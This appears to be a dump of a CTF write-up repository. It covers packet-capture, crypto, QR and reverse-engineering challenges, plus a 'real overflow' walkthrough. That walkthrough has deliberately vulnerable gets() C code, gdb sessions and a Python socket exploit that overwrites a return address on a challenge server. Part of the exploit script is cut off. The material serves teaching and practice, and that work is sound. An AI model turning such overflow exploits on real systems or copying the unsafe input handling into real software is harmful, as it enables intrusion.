3 |
4 | char flag[] = "not_the_real_flag";
5 |
6 | int main(int argc, char *argv[]) {
7 | int data = 0xdeadbeef;
8 | char buf[1024];
9 |
10 | printf("What's your name? ");
11 | fflush(stdout);
12 |
13 | gets(buf);
14 |
15 | printf("Hi %s\n", buf);
16 | fflush(stdout);
17 |
18 | if (data != 0xdeadbeef) {
19 | printf("How did this happen? Here is your flag: \"%s\"\n", flag);
20 | }
21 |
22 | return 0;
23 | }
24 |
25 |
--------------------------------------------------------------------------------
/pcap/images/pcap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/pcap/images/pcap.png
--------------------------------------------------------------------------------
/pcap/images/pcap_post1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/pcap/images/pcap_post1.png
--------------------------------------------------------------------------------
/pcap/images/pcap_post2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/pcap/images/pcap_post2.png
--------------------------------------------------------------------------------
/pcap/pcap.md:
--------------------------------------------------------------------------------
1 | pcap
2 | ====
3 |
4 | Flag: **use_ssl_dude**
5 |
6 | 
7 |
8 | The challenge flavortext says "Check out this [pcap](pcap.pcap "pcap")".
9 |
10 | Opening the packet capture file with Wireshark, we see one HTTP (and thus
11 | unencrypted) POST containing login credentials:
12 |
13 | 
14 |
15 | And then a second, which contains our flag:
16 |
17 | 
18 |
19 | The flag is thus `use_ssl_dude`.
20 |
21 | [« Return to challenge board](../README.md "Return to challenge board")
22 |
--------------------------------------------------------------------------------
/pcap/pcap.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/pcap/pcap.pcap
--------------------------------------------------------------------------------
/pseudocode/images/pseudocode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/pseudocode/images/pseudocode.png
--------------------------------------------------------------------------------
/pseudocode/pseudocode:
--------------------------------------------------------------------------------
1 | import crypt
2 |
3 | label START
4 | $rand = random.range(21..29)
5 | if $rand mod 22 == 1
6 | continue
7 | else
8 | goto START
9 | $hash = crypt.md5($rand)
10 | print("flag{"+$hash[29]+$hash[6]+$hash[6]+$hash[14]+"}")
11 | quit
12 |
13 |
--------------------------------------------------------------------------------
/pseudocode/pseudocode.md:
--------------------------------------------------------------------------------
1 | hardcoded
2 | =========
3 |
4 | Flag: **affe**
5 |
6 | 
7 |
8 | The challenge flavortext says "Found some old [pseudocode](pseudocode
9 | "pseudocode"), but I never implemented it."
10 |
11 | import crypt
12 |
13 | label START
14 | $rand = random.range(21..29)
15 | if $rand mod 22 == 1
16 | continue
17 | else
18 | goto START
19 | $hash = crypt.md5($rand)
20 | print("flag{"+$hash[29]+$hash[6]+$hash[6]+$hash[14]+"}")
21 | quit
22 |
23 | Examining the code, we see that it seeds an `md5` hash implementation with a
24 | number between 21 and 29 that is 1 mod 22, and constructs a flag from bits in
25 | the hash.
26 |
27 | The hash function is deterministic for a given seed, and 23 is the only number
28 | in the allowed range that is 1 mod 22, so we can implement the pseudocode using
29 | 23 as the seed to construct the flag:
30 |
31 | >>> import hashlib
32 | >>> m = hashlib.md5("23")
33 | >>> digest = m.hexdigest()
34 | >>> print digest[29] + digest[6] + digest[6] + digest[14]
35 | affe
36 |
37 | The flag is thus `affe`.
38 |
39 | [« Return to challenge board](../README.md "Return to challenge board")
40 |
--------------------------------------------------------------------------------
/puzzle/images/puzzle.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/puzzle/images/puzzle.png
--------------------------------------------------------------------------------
/puzzle/images/puzzle_pieces.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/puzzle/images/puzzle_pieces.png
--------------------------------------------------------------------------------
/puzzle/images/qr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/puzzle/images/qr.png
--------------------------------------------------------------------------------
/puzzle/images/qr_decoded.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/puzzle/images/qr_decoded.png
--------------------------------------------------------------------------------
/puzzle/puzzle.md:
--------------------------------------------------------------------------------
1 | puzzle
2 | ======
3 |
4 | Flag: **zero_mutarts_ninja_turtles**
5 |
6 | 
7 |
8 | The challenge flavortext says "I hope this doesn't leave you
9 | [puzzled](puzzle.zip "puzzle Zip archive")." The link is to a Zip archive
10 | containing 16 black and white square images:
11 |
12 | 
13 |
14 | These appear to be pieces of a QR code, so let's reassemble them:
15 |
16 | 
17 |
18 | Uploading the assembled QR code to an [online QR code decoder](http://zxing.org/
19 | "online QR code decoder") reveals the flag:
20 |
21 | 
22 |
23 | The flag is thus `zero_mutarts_ninja_turtles`.
24 |
25 | [« Return to challenge board](../README.md "Return to challenge board")
26 |
--------------------------------------------------------------------------------
/puzzle/puzzle.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/puzzle/puzzle.zip
--------------------------------------------------------------------------------
/real_overflow/images/real_overflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/real_overflow/images/real_overflow.png
--------------------------------------------------------------------------------
/real_overflow/real_overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/real_overflow/real_overflow
--------------------------------------------------------------------------------
/real_overflow/real_overflow.md:
--------------------------------------------------------------------------------
1 | real overflow
2 | =============
3 |
4 | Flag: **were_running_out_of_flags**
5 |
6 | 
7 |
8 | The challenge flavortext says "Smashing the stack for fun and profit, the next
9 | level" and links to an executable and its source code:
10 |
11 | * [source](real_overflow_redacted.c "real_overflow_redacted.c")
12 | * [binary](real_overflow "real_overflow") (x86)
13 |
14 | #include
15 | #include
16 |
17 | char flag[] = "not_the_real_flag";
18 |
19 | void printf_flag(void) {
20 | printf("Well done! here is your flag: %s\n", flag);
21 | fflush(stdout);
22 | }
23 |
24 | int main(int argc, char *argv[]) {
25 | char buf[1024];
26 |
27 | printf("Oh you again, did you know that the address of print_flag is at %p?\nCan you tell me your name again? ", printf_flag);
28 | fflush(stdout);
29 |
30 | gets(buf);
31 |
32 | printf("Hi %s\n", buf);
33 | fflush(stdout);
34 |
35 | return 0;
36 | }
37 |
38 | Examining the source code for the challenge, we notice two things:
39 |
40 | 1. There is a buffer overflow. The program `gets(buf)` from user input without
41 | limiting the read to the 1024-byte length of `buf`.
42 |
43 | 2. We are given the address of a function that prints the flag before being
44 | prompted for our name.
45 |
46 | [x86 calling conventions](https://en.wikipedia.org/wiki/X86_calling_conventions
47 | "x86 calling conventions") dictate that when calling a function, the return
48 | address is stored on the stack, just above the saved base pointer. If we can
49 | overwrite a return address with the address of `print_flag`, instead of jumping
50 | to that return address upon completing the function, the program will jump to
51 | and execute `print_flag` instead.
52 |
53 | Let's check our understanding using `gdb`.
54 |
55 | First, we'll need to compile `real_overflow_redacted.c` a) to allow
56 | stack-smashing, via `-fno-stack-protector`, and b) with debug symbols so we can
57 | set breakpoints, via `-g`:
58 |
59 | gcc -g -o real_overflow real_overflow_redacted.c -fno-stack-protector
60 |
61 | Next, running `real_overflow` under `gdb`, let's set breakpoints before and
62 | after the buffer overflow:
63 |
64 | $ gdb real_overflow
65 | GNU gdb (GDB) 7.5-ubuntu
66 | Reading symbols from /tmp/real_overflow...done.
67 | (gdb) break 15
68 | Breakpoint 1 at 0x400641: file real_overflow_redacted.c, line 15.
69 | (gdb) break 19
70 | Breakpoint 2 at 0x40065f: file real_overflow_redacted.c, line 19.
71 | (gdb) run
72 | Starting program: /tmp/real_overflow
73 | Oh you again, did you know that the address of print_flag is at 0x4005ec?
74 | Breakpoint 1, main (argc=1, argv=0x7fffffffe638) at real_overflow_redacted.c:15
75 | 15 fflush(stdout);
76 | (gdb) x/10x $rbp
77 | 0x7fffffffe550: 0x00000000 0x00000000 0xf7a3c76d 0x00007fff
78 | 0x7fffffffe560: 0x00000000 0x00000000 0xffffe638 0x00007fff
79 | 0x7fffffffe570: 0x00000000 0x00000001
80 |
81 | After the first breakpoint, before the buffer overflow, the base pointer is
82 | `0x0000000000000000` and return address in the stack frame for `main` is
83 | `0x00007ffff7a3c76d` (this is a 64-bit system).
84 |
85 | Continuing to the next breakpoint:
86 |
87 | (gdb) c
88 | Continuing.
89 | Can you tell me your name again? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
90 |
91 | Breakpoint 2, main (argc=1, argv=0x7fffffffe638) at real_overflow_redacted.c:19
92 | 19 printf("Hi %s\n", buf);
93 | (gdb) x/10x $rbp
94 | 0x7fffffffe550: 0x41414141 0x41414141 0x41414141 0x41414141
95 | 0x7fffffffe560: 0x00000000 0x00000000 0xffffe638 0x00007fff
96 | 0x7fffffffe570: 0x00000000 0x00000001
97 |
98 | At the second breakpoint, after we've provided 1040 bytes of input (enough to
99 | overflow `buf` and hopefully enough of the stack to overwrite the return address
100 | of the stack frame for `main`), we can see that the base pointer and return
101 | address have been overwritten by our `A`s (0x41).
102 |
103 | Continuing:
104 |
105 | (gdb) c
106 | Continuing.
107 | Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
108 |
109 | Program received signal SIGSEGV, Segmentation fault.
110 | 0x000000000040068d in main (argc=1, argv=0x7fffffffe638) at real_overflow_redacted.c:23
111 | 23 }
112 |
113 | Our test payload segfaults because on returning from `main` we try to jump to
114 | `0x4141414141414141`, which is an invalid address.
115 |
116 | All we need to do, then, is to send as our name a payload containing padding and
117 | then the address of `print_flag`.
118 |
119 | The address of `print_flag` will overwrite the return address in the stack frame
120 | for `main`, and instead of jumping back to the caller of `main` (a long story we
121 | won't get into for this challenge), the program will jump to and execute
122 | `print_flag`.
123 |
124 | Note that, while we were testing on a 64-bit system, the challenge executable is
125 | being run on a 32-bit system. We can tell because `objdump -d` on the provided
126 | binary shows registers like `$esp` and `$ebp`. Thus, when crafting our payload,
127 | pointers are 4 bytes, rather than the 8 we saw under `gdb`:
128 |
129 | import re, socket, struct
130 |
131 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
132 | s.connect(('ctf.stratum0.net', 4444))
133 |
134 | # Welcome message is:
135 | # Oh you again, did you know that the address of print_flag is at 0x804849c?
136 | # Can you tell me your name again?
137 | welcome_msg = s.recv(4096)
138 | flag_func_addr = re.search("0x(.*)\?", welcome_msg).groups()[0].zfill(8)
139 |
140 | # To format the print_flag address for the payload, pack a struct with
141 | # the 4-byte address, little-endian.
142 |
143 | # How far up the stack the return address is may vary from system to
144 | # system, so repeat the address a couple of times past the bounds of
145 | # the array.
146 | payload = "A" * 1024 + struct.pack("
2 | #include
3 |
4 | char flag[] = "not_the_real_flag";
5 |
6 | void printf_flag(void) {
7 | printf("Well done! here is your flag: %s\n", flag);
8 | fflush(stdout);
9 | }
10 |
11 | int main(int argc, char *argv[]) {
12 | char buf[1024];
13 |
14 | printf("Oh you again, did you know that the address of print_flag is at %p?\nCan you tell me your name again? ", printf_flag);
15 | fflush(stdout);
16 |
17 | gets(buf);
18 |
19 | printf("Hi %s\n", buf);
20 | fflush(stdout);
21 |
22 | return 0;
23 | }
24 |
25 |
--------------------------------------------------------------------------------
/rivest/images/rivest.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/rivest/images/rivest.png
--------------------------------------------------------------------------------
/rivest/rivest.md:
--------------------------------------------------------------------------------
1 | rivest-shamir-adleman
2 | =====================
3 |
4 | Flag: **rivest_and_the_cool_gang_would_be_proud**
5 |
6 | 
7 |
8 | The challenge flavortext says "This one is important, we have no clue
9 | how to decrypt the secret message! Can you help us?" and links to:
10 |
11 | * [rivest.py](rivest.py "rivest.py")
12 | * [rivest.txt](rivest.txt "rivest.txt")
13 |
14 | `rivest.txt` is a list of numbers. `rivest.py` is a short Python script that
15 | processes `rivest.txt` and tells us to implement a function that will decrypt
16 | each number.
17 |
18 | Given the name of the puzzle and the constants in the script, it is likely that
19 | each number in `rivest.txt` is an RSA-encrypted letter, and putting the
20 | decrypted letters together will give us the flag.
21 |
22 | The script gives us `n`, the modulus, and `e`, the public key exponent, but
23 | unlike with the [rsa challenge](../rsa/rsa.md "rsa challenge"), we aren't told
24 | `d`, the private key exponent we need to decrypt the messages:
25 |
26 | n = 80646413
27 | e = 5
28 | # You'll have to find the d yourself..
29 | d = unknown
30 |
31 | Recall that d is selected such that `(d * e) % φ(n) = 1`, and `φ(n) = (p - 1) *
32 | (q - 1)`, where `p` and `q` are the prime factors of `n`.
33 |
34 | We don't know `p` and `q`, but fortunately `n` is small enough that we can
35 | quickly compute them, even using a very simple algorithm:
36 |
37 | def primes(n):
38 | d = 2
39 | while d * d <= n:
40 | if (n % d) == 0:
41 | return d, n / d
42 | else:
43 | d += 1
44 |
45 | p, q = primes(n)
46 |
47 | Now that we have `p` and `q`, we can compute `φ(n)`, and then `d`, using the
48 | `modinv` function supplied in `rivest.py`:
49 |
50 | tot = (p - 1) * (q - 1)
51 | d = modinv(e, tot) % tot
52 |
53 | Now that we have `d`, to recover the plaintext we can compute `m ≡ c^d (mod n)`
54 | using Python's built-in `pow` as we did in the [rsa challenge](../rsa/rsa.md
55 | "rsa challenge"). Here is the solution in full:
56 |
57 | import sys
58 |
59 | ### Given to us in the challenge ###
60 |
61 | n = 80646413
62 | e = 5
63 |
64 | def xgcd(a,b):
65 | prevx, x = 1, 0; prevy, y = 0, 1
66 | while b:
67 | q, r = divmod(a,b)
68 | x, prevx = prevx - q*x, x
69 | y, prevy = prevy - q*y, y
70 | a, b = b, r
71 | return a, prevx, prevy
72 |
73 | def modinv(a, m):
74 | a, u, v = xgcd(a, m)
75 | if a <> 1:
76 | raise Exception('No inverse: %d (mod %d)' % (a, m))
77 | return u
78 |
79 | ### Our code ###
80 |
81 | def primes(n):
82 | d = 2
83 | while d * d <= n:
84 | if (n % d) == 0:
85 | return d, n / d
86 | else:
87 | d += 1
88 |
89 | def decrypt(c):
90 | return pow(c, d, n)
91 |
92 | p, q = primes(n)
93 | tot = (p - 1) * (q - 1)
94 | d = modinv(e, tot) % tot
95 |
96 | with open(sys.argv[1] , "r") as f:
97 | message = ""
98 | for line in f:
99 | message += chr(decrypt(int(line.strip())))
100 | print message
101 |
102 | Running the script, we get:
103 |
104 | $ python rivest.py rivest.txt
105 | flag{rivest_and_the_cool_gang_would_be_proud}
106 |
107 | The flag is thus `rivest_and_the_cool_gang_would_be_proud`.
108 |
109 | [« Return to challenge board](../README.md "Return to challenge board")
110 |
--------------------------------------------------------------------------------
/rivest/rivest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import sys
4 |
5 | n= 80646413
6 | e = 5
7 |
8 | # You'll have to find the d yourself..
9 | d = unknown
10 |
11 | f = open( sys.argv[1] , "r" )
12 | for line in f:
13 | line = int(line.strip())
14 | # you'll have to insert the decrypt function for each line(number) here!
15 | #dec = ...
16 | print chr(dec)
17 |
18 |
19 |
20 |
21 | # might come handy
22 | def xgcd(a,b):
23 | """Extended GCD:
24 | Returns (gcd, x, y) where gcd is the greatest common divisor of a and b
25 | with the sign of b if b is nonzero, and with the sign of a if b is 0.
26 | The numbers x,y are such that gcd = ax+by."""
27 | prevx, x = 1, 0; prevy, y = 0, 1
28 | while b:
29 | q, r = divmod(a,b)
30 | x, prevx = prevx - q*x, x
31 | y, prevy = prevy - q*y, y
32 | a, b = b, r
33 | return a, prevx, prevy
34 |
35 | def modinv(a, m):
36 | """Modular multiplicative inverse, i.e. a^-1 = 1 (mod m)"""
37 | a, u, v = xgcd(a, m)
38 | if a <> 1:
39 | raise Exception('No inverse: %d (mod %d)' % (a, m))
40 | return u
41 |
42 |
--------------------------------------------------------------------------------
/rivest/rivest.txt:
--------------------------------------------------------------------------------
1 | 72895864
2 | 15633602
3 | 38820479
4 | 60303684
5 | 7458706
6 | 60299530
7 | 20682371
8 | 54642689
9 | 26066811
10 | 32615038
11 | 35349196
12 | 76400140
13 | 38820479
14 | 56463813
15 | 80491201
16 | 76400140
17 | 35349196
18 | 69567074
19 | 26066811
20 | 76400140
21 | 74270178
22 | 76127647
23 | 76127647
24 | 15633602
25 | 76400140
26 | 60303684
27 | 38820479
28 | 56463813
29 | 60303684
30 | 76400140
31 | 72844764
32 | 76127647
33 | 69302434
34 | 15633602
35 | 80491201
36 | 76400140
37 | 6809712
38 | 26066811
39 | 76400140
40 | 42498798
41 | 60299530
42 | 76127647
43 | 69302434
44 | 80491201
45 | 33234011
46 |
--------------------------------------------------------------------------------
/rsa/images/rsa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/rsa/images/rsa.png
--------------------------------------------------------------------------------
/rsa/rsa.md:
--------------------------------------------------------------------------------
1 | the magic of rsa
2 | ================
3 |
4 | Flag: **you_got_the_basics_my_padawan**
5 |
6 | 
7 |
8 | The challenge flavortext says "You were able to hear some whispering on the last
9 | crypto party! \*whisper\* d is 35181901. Keep it secret or we are doomed!" and
10 | links to:
11 |
12 | * [rsa.py](rsa.py "Python script")
13 | * [rsa.txt](rsa.txt "Text file containing a list of numbers")
14 |
15 | `rsa.txt` is a list of numbers. `rsa.py` is a short Python script that processes
16 | `rsa.txt` and tells us to implement a function that will decrypt each number.
17 |
18 | Given the name of the puzzle and the constants in the script, it is likely that
19 | each number in `rsa.txt` is an RSA-encrypted letter, and putting the decrypted
20 | letters together will give us the flag.
21 |
22 | First, let's make sure we understand the constants:
23 |
24 | * `n = 65354147` and is used as the modulus for public and private keys. `n` =
25 | `p * q`, where `p` and `q` are distinct prime numbers. `p`, `q`, and `n` are
26 | much larger in real RSA exchanges.
27 |
28 | * `e = 13` and is used as the public key exponent: `c ≡ m^e (mod n)`, where `m`
29 | is the plaintext and `c` is the resulting ciphertext, i.e. a number in
30 | `rsa.txt` in this challenge. To choose `e`, we must first compute
31 |
32 | φ(n) = φ(p) * φ(q) = (p − 1) * (q − 1)
33 |
34 | where `φ(x)` is [Euler's totient
35 | function](https://en.wikipedia.org/wiki/Euler%27s_totient_function "Euler's
36 | totient function"), the number of integers `≤ x` that are relatively prime to
37 | `x`.
38 |
39 | `e` is then chosen such that `e` and `φ(n)` are relatively prime. `e` is much
40 | larger in real RSA exchanges.
41 |
42 | Fortunately, we are given `e` so we don't have to worry about this!
43 |
44 | * `d = 35181901` according to the flavortext and is used as the private key
45 | exponent: `m ≡ c^d (mod n)`. `d` is the multiplicative inverse of `e` and is
46 | supposed to be kept secret, so that only the holder of the secret can decrypt
47 | the encrypted messages.
48 |
49 | To recover the plaintext `m`, we need to compute `m ≡ c^d (mod n)`. Python's
50 | built-in `pow` can do modular exponentiation, so that will be our decryption
51 | function:
52 |
53 | import sys
54 |
55 | n = 65354147
56 | e = 13
57 | d = 35181901
58 |
59 | def decrypt(c):
60 | return pow(c, d, n)
61 |
62 | with open(sys.argv[1] , "r") as f:
63 | message = ""
64 | for line in f:
65 | message += chr(decrypt(int(line.strip())))
66 | print message
67 |
68 | Running the script, we get:
69 |
70 | $ python rsa.py rsa.txt
71 | flag{you_got_the_basics_my_padawan}
72 |
73 | The flag is thus `you_got_the_basics_my_padawan`.
74 |
75 | If we want to see what constants for a real RSA private key look like, we can
76 | generate one with:
77 |
78 | openssl genrsa -out private.pem 2048
79 |
80 | and inspect it with
81 |
82 | openssl rsa -text -in private.pem
83 |
84 | In this case, the modulus `n` is 256 bytes, made from primes `p` and `q` that
85 | are 128 bytes each. The public exponent `e` is 65537, and the private exponent
86 | `d` is 256 bytes.
87 |
88 | [« Return to challenge board](../README.md "Return to challenge board")
89 |
--------------------------------------------------------------------------------
/rsa/rsa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import sys
4 |
5 | n= 65354147
6 | e = 13
7 |
8 | d = ??
9 |
10 | f = open( sys.argv[1] , "r" )
11 | for line in f:
12 | line = int(line.strip())
13 | # you'll have to insert the decrypt function for each line(number) here!
14 | #dec = ...
15 | print chr(dec)
16 |
--------------------------------------------------------------------------------
/rsa/rsa.txt:
--------------------------------------------------------------------------------
1 | 32588732
2 | 56947340
3 | 16730166
4 | 16529146
5 | 17037091
6 | 9958499
7 | 18895626
8 | 49410873
9 | 58063242
10 | 16529146
11 | 18895626
12 | 30273022
13 | 58063242
14 | 30273022
15 | 60194095
16 | 9956852
17 | 58063242
18 | 44337129
19 | 16730166
20 | 5059543
21 | 40999214
22 | 39158796
23 | 5059543
24 | 58063242
25 | 54302449
26 | 9958499
27 | 58063242
28 | 8646641
29 | 16730166
30 | 51307370
31 | 16730166
32 | 57845836
33 | 16730166
34 | 34996934
35 | 32762958
36 |
--------------------------------------------------------------------------------
/serial_verifier/images/serial_verifier.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/serial_verifier/images/serial_verifier.png
--------------------------------------------------------------------------------
/serial_verifier/images/serial_verifier_session.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/serial_verifier/images/serial_verifier_session.png
--------------------------------------------------------------------------------
/serial_verifier/serial:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesstess/zeromutarts-ctf/c9984287b393bb48ff3778d17f88ca42cd7600b4/serial_verifier/serial
--------------------------------------------------------------------------------
/serial_verifier/serial.dump:
--------------------------------------------------------------------------------
1 |
2 | serial: file format elf32-i386
3 |
4 |
5 | Disassembly of section .init:
6 |
7 | 080482f4 <_init>:
8 | 80482f4: 53 push %ebx
9 | 80482f5: 83 ec 08 sub $0x8,%esp
10 | 80482f8: e8 b3 00 00 00 call 80483b0 <__x86.get_pc_thunk.bx>
11 | 80482fd: 81 c3 23 16 00 00 add $0x1623,%ebx
12 | 8048303: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax
13 | 8048309: 85 c0 test %eax,%eax
14 | 804830b: 74 05 je 8048312 <_init+0x1e>
15 | 804830d: e8 3e 00 00 00 call 8048350 <__gmon_start__@plt>
16 | 8048312: 83 c4 08 add $0x8,%esp
17 | 8048315: 5b pop %ebx
18 | 8048316: c3 ret
19 |
20 | Disassembly of section .plt:
21 |
22 | 08048320 :
23 | 8048320: ff 35 24 99 04 08 pushl 0x8049924
24 | 8048326: ff 25 28 99 04 08 jmp *0x8049928
25 | 804832c: 00 00 add %al,(%eax)
26 | ...
27 |
28 | 08048330 :
29 | 8048330: ff 25 2c 99 04 08 jmp *0x804992c
30 | 8048336: 68 00 00 00 00 push $0x0
31 | 804833b: e9 e0 ff ff ff jmp 8048320 <_init+0x2c>
32 |
33 | 08048340 :
34 | 8048340: ff 25 30 99 04 08 jmp *0x8049930
35 | 8048346: 68 08 00 00 00 push $0x8
36 | 804834b: e9 d0 ff ff ff jmp 8048320 <_init+0x2c>
37 |
38 | 08048350 <__gmon_start__@plt>:
39 | 8048350: ff 25 34 99 04 08 jmp *0x8049934
40 | 8048356: 68 10 00 00 00 push $0x10
41 | 804835b: e9 c0 ff ff ff jmp 8048320 <_init+0x2c>
42 |
43 | 08048360 <__libc_start_main@plt>:
44 | 8048360: ff 25 38 99 04 08 jmp *0x8049938
45 | 8048366: 68 18 00 00 00 push $0x18
46 | 804836b: e9 b0 ff ff ff jmp 8048320 <_init+0x2c>
47 |
48 | 08048370 <__isoc99_scanf@plt>:
49 | 8048370: ff 25 3c 99 04 08 jmp *0x804993c
50 | 8048376: 68 20 00 00 00 push $0x20
51 | 804837b: e9 a0 ff ff ff jmp 8048320 <_init+0x2c>
52 |
53 | Disassembly of section .text:
54 |
55 | 08048380 <_start>:
56 | 8048380: 31 ed xor %ebp,%ebp
57 | 8048382: 5e pop %esi
58 | 8048383: 89 e1 mov %esp,%ecx
59 | 8048385: 83 e4 f0 and $0xfffffff0,%esp
60 | 8048388: 50 push %eax
61 | 8048389: 54 push %esp
62 | 804838a: 52 push %edx
63 | 804838b: 68 60 86 04 08 push $0x8048660
64 | 8048390: 68 f0 85 04 08 push $0x80485f0
65 | 8048395: 51 push %ecx
66 | 8048396: 56 push %esi
67 | 8048397: 68 7d 84 04 08 push $0x804847d
68 | 804839c: e8 bf ff ff ff call 8048360 <__libc_start_main@plt>
69 | 80483a1: f4 hlt
70 | 80483a2: 66 90 xchg %ax,%ax
71 | 80483a4: 66 90 xchg %ax,%ax
72 | 80483a6: 66 90 xchg %ax,%ax
73 | 80483a8: 66 90 xchg %ax,%ax
74 | 80483aa: 66 90 xchg %ax,%ax
75 | 80483ac: 66 90 xchg %ax,%ax
76 | 80483ae: 66 90 xchg %ax,%ax
77 |
78 | 080483b0 <__x86.get_pc_thunk.bx>:
79 | 80483b0: 8b 1c 24 mov (%esp),%ebx
80 | 80483b3: c3 ret
81 | 80483b4: 66 90 xchg %ax,%ax
82 | 80483b6: 66 90 xchg %ax,%ax
